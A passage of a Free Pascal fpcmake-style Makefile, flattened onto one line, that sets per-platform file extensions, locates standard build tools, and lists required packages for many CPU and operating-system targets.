($(OS_TARGET),android) BATCHEXT=.sh EXEEXT= HASSHAREDLIB=1 SHORTSUFFIX=lnx endif endif ifeq ($(OS_TARGET),linux) BATCHEXT=.sh EXEEXT= HASSHAREDLIB=1 SHORTSUFFIX=lnx endif ifeq ($(OS_TARGET),dragonfly) BATCHEXT=.sh EXEEXT= HASSHAREDLIB=1 SHORTSUFFIX=df endif ifeq ($(OS_TARGET),freebsd) BATCHEXT=.sh EXEEXT= HASSHAREDLIB=1 SHORTSUFFIX=fbs endif ifeq ($(OS_TARGET),netbsd) BATCHEXT=.sh EXEEXT= HASSHAREDLIB=1 SHORTSUFFIX=nbs endif ifeq ($(OS_TARGET),openbsd) BATCHEXT=.sh EXEEXT= HASSHAREDLIB=1 SHORTSUFFIX=obs endif ifeq ($(OS_TARGET),win32) SHAREDLIBEXT=.dll SHORTSUFFIX=w32 endif ifeq ($(OS_TARGET),os2) BATCHEXT=.cmd AOUTEXT=.out STATICLIBPREFIX= SHAREDLIBEXT=.dll SHORTSUFFIX=os2 ECHO=echo IMPORTLIBPREFIX= endif ifeq ($(OS_TARGET),emx) BATCHEXT=.cmd AOUTEXT=.out STATICLIBPREFIX= SHAREDLIBEXT=.dll SHORTSUFFIX=emx ECHO=echo IMPORTLIBPREFIX= endif ifeq ($(OS_TARGET),amiga) EXEEXT= SHAREDLIBEXT=.library SHORTSUFFIX=amg endif ifeq ($(OS_TARGET),aros) EXEEXT= SHAREDLIBEXT=.library SHORTSUFFIX=aros endif ifeq ($(OS_TARGET),morphos) EXEEXT= SHAREDLIBEXT=.library SHORTSUFFIX=mos endif ifeq ($(OS_TARGET),atari) EXEEXT=.ttp SHORTSUFFIX=ata endif ifeq ($(OS_TARGET),beos) BATCHEXT=.sh EXEEXT= SHORTSUFFIX=be endif ifeq ($(OS_TARGET),haiku) BATCHEXT=.sh EXEEXT= SHORTSUFFIX=hai endif ifeq ($(OS_TARGET),solaris) BATCHEXT=.sh EXEEXT= SHORTSUFFIX=sun endif ifeq ($(OS_TARGET),qnx) BATCHEXT=.sh EXEEXT= SHORTSUFFIX=qnx endif ifeq ($(OS_TARGET),netware) EXEEXT=.nlm STATICLIBPREFIX= SHORTSUFFIX=nw IMPORTLIBPREFIX=imp endif ifeq ($(OS_TARGET),netwlibc) EXEEXT=.nlm STATICLIBPREFIX= SHORTSUFFIX=nwl IMPORTLIBPREFIX=imp endif ifeq ($(OS_TARGET),macosclassic) BATCHEXT= EXEEXT= DEBUGSYMEXT=.xcoff SHORTSUFFIX=mac IMPORTLIBPREFIX=imp endif ifneq ($(findstring $(OS_TARGET),darwin iphonesim ios),) BATCHEXT=.sh EXEEXT= HASSHAREDLIB=1 SHORTSUFFIX=dwn EXEDBGEXT=.dSYM endif ifeq ($(OS_TARGET),gba) EXEEXT=.gba SHAREDLIBEXT=.so SHORTSUFFIX=gba endif ifeq ($(OS_TARGET),symbian) SHAREDLIBEXT=.dll SHORTSUFFIX=symbian endif ifeq ($(OS_TARGET),NativeNT) SHAREDLIBEXT=.dll SHORTSUFFIX=nativent endif ifeq ($(OS_TARGET),wii) EXEEXT=.dol SHAREDLIBEXT=.so SHORTSUFFIX=wii endif ifeq ($(OS_TARGET),aix) BATCHEXT=.sh EXEEXT= SHAREDLIBEXT=.a SHORTSUFFIX=aix endif ifeq ($(OS_TARGET),java) OEXT=.class ASMEXT=.j SHAREDLIBEXT=.jar SHORTSUFFIX=java endif ifeq ($(CPU_TARGET),jvm) ifeq ($(OS_TARGET),android) OEXT=.class ASMEXT=.j SHAREDLIBEXT=.jar SHORTSUFFIX=android endif endif ifeq ($(OS_TARGET),msdos) STATICLIBPREFIX= STATICLIBEXT=.a SHORTSUFFIX=d16 endif ifeq ($(OS_TARGET),msxdos) STATICLIBPREFIX= STATICLIBEXT=.a SHORTSUFFIX=msd endif ifeq ($(OS_TARGET),embedded) ifeq ($(CPU_TARGET),i8086) STATICLIBPREFIX= STATICLIBEXT=.a else EXEEXT=.bin endif ifeq ($(CPU_TARGET),z80) OEXT=.rel endif SHORTSUFFIX=emb endif ifeq ($(OS_TARGET),win16) STATICLIBPREFIX= STATICLIBEXT=.a SHAREDLIBEXT=.dll SHORTSUFFIX=w16 endif ifeq ($(OS_TARGET),zxspectrum) OEXT=.rel endif ifneq ($(findstring $(OS_SOURCE),$(LIMIT83fs)),) FPCMADE=fpcmade.$(SHORTSUFFIX) ZIPSUFFIX=$(SHORTSUFFIX) ZIPCROSSPREFIX= ZIPSOURCESUFFIX=src ZIPEXAMPLESUFFIX=exm else FPCMADE=fpcmade.$(TARGETSUFFIX) ZIPSOURCESUFFIX=.source ZIPEXAMPLESUFFIX=.examples ifdef CROSSCOMPILE ZIPSUFFIX=.$(SOURCESUFFIX) ZIPCROSSPREFIX=$(TARGETSUFFIX)- else ZIPSUFFIX=.$(TARGETSUFFIX) ZIPCROSSPREFIX= endif endif ifndef ECHO ECHO:=$(strip $(wildcard $(addsuffix /gecho$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(ECHO),) ECHO:=$(strip $(wildcard $(addsuffix /echo$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(ECHO),) ECHO= __missing_command_ECHO else ECHO:=$(firstword $(ECHO)) endif else ECHO:=$(firstword $(ECHO)) endif endif export ECHO ifndef DATE DATE:=$(strip $(wildcard $(addsuffix /gdate$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(DATE),) DATE:=$(strip $(wildcard $(addsuffix /date$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(DATE),) DATE= __missing_command_DATE else DATE:=$(firstword $(DATE)) endif else DATE:=$(firstword $(DATE)) endif endif export DATE ifndef GINSTALL GINSTALL:=$(strip $(wildcard $(addsuffix /ginstall$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(GINSTALL),) GINSTALL:=$(strip $(wildcard $(addsuffix /install$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(GINSTALL),) GINSTALL= __missing_command_GINSTALL else GINSTALL:=$(firstword $(GINSTALL)) endif else GINSTALL:=$(firstword $(GINSTALL)) endif endif export GINSTALL ifndef CPPROG CPPROG:=$(strip $(wildcard $(addsuffix /cp$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(CPPROG),) CPPROG= __missing_command_CPPROG else CPPROG:=$(firstword $(CPPROG)) endif endif export CPPROG ifndef RMPROG RMPROG:=$(strip $(wildcard $(addsuffix /rm$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(RMPROG),) RMPROG= __missing_command_RMPROG else RMPROG:=$(firstword $(RMPROG)) endif endif export RMPROG ifndef MVPROG MVPROG:=$(strip $(wildcard $(addsuffix /mv$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(MVPROG),) MVPROG= __missing_command_MVPROG else MVPROG:=$(firstword $(MVPROG)) endif endif export MVPROG ifndef MKDIRPROG MKDIRPROG:=$(strip $(wildcard $(addsuffix /gmkdir$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(MKDIRPROG),) MKDIRPROG:=$(strip $(wildcard $(addsuffix /mkdir$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(MKDIRPROG),) MKDIRPROG= __missing_command_MKDIRPROG else MKDIRPROG:=$(firstword $(MKDIRPROG)) endif else MKDIRPROG:=$(firstword $(MKDIRPROG)) endif endif export MKDIRPROG ifndef ECHOREDIR ifndef inUnix ECHOREDIR=echo else ECHOREDIR=$(ECHO) endif endif ifndef COPY COPY:=$(CPPROG) -fp endif ifndef COPYTREE COPYTREE:=$(CPPROG) -Rfp endif ifndef MKDIRTREE MKDIRTREE:=$(MKDIRPROG) -p endif ifndef MOVE MOVE:=$(MVPROG) -f endif ifndef DEL DEL:=$(RMPROG) -f endif ifndef DELTREE DELTREE:=$(RMPROG) -rf endif ifndef INSTALL ifdef inUnix INSTALL:=$(GINSTALL) -c -m 644 else INSTALL:=$(COPY) endif endif ifndef INSTALLEXE ifdef inUnix INSTALLEXE:=$(GINSTALL) -c -m 755 else INSTALLEXE:=$(COPY) endif endif ifndef MKDIR MKDIR:=$(GINSTALL) -m 755 -d endif export ECHOREDIR COPY COPYTREE MOVE DEL DELTREE INSTALL INSTALLEXE MKDIR ifndef PPUMOVE PPUMOVE:=$(strip $(wildcard $(addsuffix /ppumove$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(PPUMOVE),) PPUMOVE= __missing_command_PPUMOVE else PPUMOVE:=$(firstword $(PPUMOVE)) endif endif export PPUMOVE ifndef FPCMAKE FPCMAKE:=$(strip $(wildcard $(addsuffix /fpcmake$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(FPCMAKE),) FPCMAKE= __missing_command_FPCMAKE else FPCMAKE:=$(firstword $(FPCMAKE)) endif endif export FPCMAKE ifndef ZIPPROG ZIPPROG:=$(strip $(wildcard $(addsuffix /zip$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(ZIPPROG),) ZIPPROG= __missing_command_ZIPPROG else ZIPPROG:=$(firstword $(ZIPPROG)) endif endif export ZIPPROG ifndef TARPROG TARPROG:=$(strip $(wildcard $(addsuffix /gtar$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(TARPROG),) TARPROG:=$(strip $(wildcard $(addsuffix /tar$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(TARPROG),) TARPROG= __missing_command_TARPROG else TARPROG:=$(firstword $(TARPROG)) endif else TARPROG:=$(firstword $(TARPROG)) endif endif export TARPROG ASNAME=$(BINUTILSPREFIX)as LDNAME=$(BINUTILSPREFIX)ld ARNAME=$(BINUTILSPREFIX)ar RCNAME=$(BINUTILSPREFIX)rc NASMNAME=$(BINUTILSPREFIX)nasm ifndef ASPROG ifdef CROSSBINDIR ASPROG=$(CROSSBINDIR)/$(ASNAME)$(SRCEXEEXT) else ASPROG=$(ASNAME) endif endif ifndef LDPROG ifdef CROSSBINDIR LDPROG=$(CROSSBINDIR)/$(LDNAME)$(SRCEXEEXT) else LDPROG=$(LDNAME) endif endif ifndef RCPROG ifdef CROSSBINDIR RCPROG=$(CROSSBINDIR)/$(RCNAME)$(SRCEXEEXT) else RCPROG=$(RCNAME) endif endif ifndef ARPROG ifdef CROSSBINDIR ARPROG=$(CROSSBINDIR)/$(ARNAME)$(SRCEXEEXT) else ARPROG=$(ARNAME) endif endif ifndef NASMPROG ifdef CROSSBINDIR NASMPROG=$(CROSSBINDIR)/$(NASMNAME)$(SRCEXEEXT) else NASMPROG=$(NASMNAME) endif endif AS=$(ASPROG) LD=$(LDPROG) RC=$(RCPROG) AR=$(ARPROG) NASM=$(NASMPROG) ifdef inUnix PPAS=./ppas$(SRCBATCHEXT) else PPAS=ppas$(SRCBATCHEXT) endif ifdef inUnix LDCONFIG=ldconfig else LDCONFIG= endif ifdef DATE DATESTR:=$(shell $(DATE) +%Y%m%d) else DATESTR= endif ZIPOPT=-9 ZIPEXT=.zip ifeq ($(USETAR),bz2) TAROPT=vj TAREXT=.tar.bz2 else TAROPT=vz TAREXT=.tar.gz endif override REQUIRE_PACKAGES=rtl fpmkunit ifeq ($(FULL_TARGET),i386-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-go32v2) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-win32) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-os2) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-freebsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-beos) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-haiku) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-netbsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-solaris) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-netware) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-openbsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-wdosx) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-darwin) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-emx) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-watcom) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-netwlibc) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-wince) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-symbian) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-nativent) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-iphonesim) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-android) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-aros) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),m68k-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),m68k-netbsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),m68k-amiga) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),m68k-atari) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),m68k-palmos) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),m68k-macosclassic) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),m68k-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-netbsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-amiga) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-macosclassic) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-darwin) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-morphos) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-wii) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-aix) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),sparc-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),sparc-netbsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),sparc-solaris) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),sparc-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-freebsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-haiku) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-netbsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-solaris) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-openbsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-darwin) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-win64) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-iphonesim) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-android) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-aros) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-dragonfly) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-netbsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 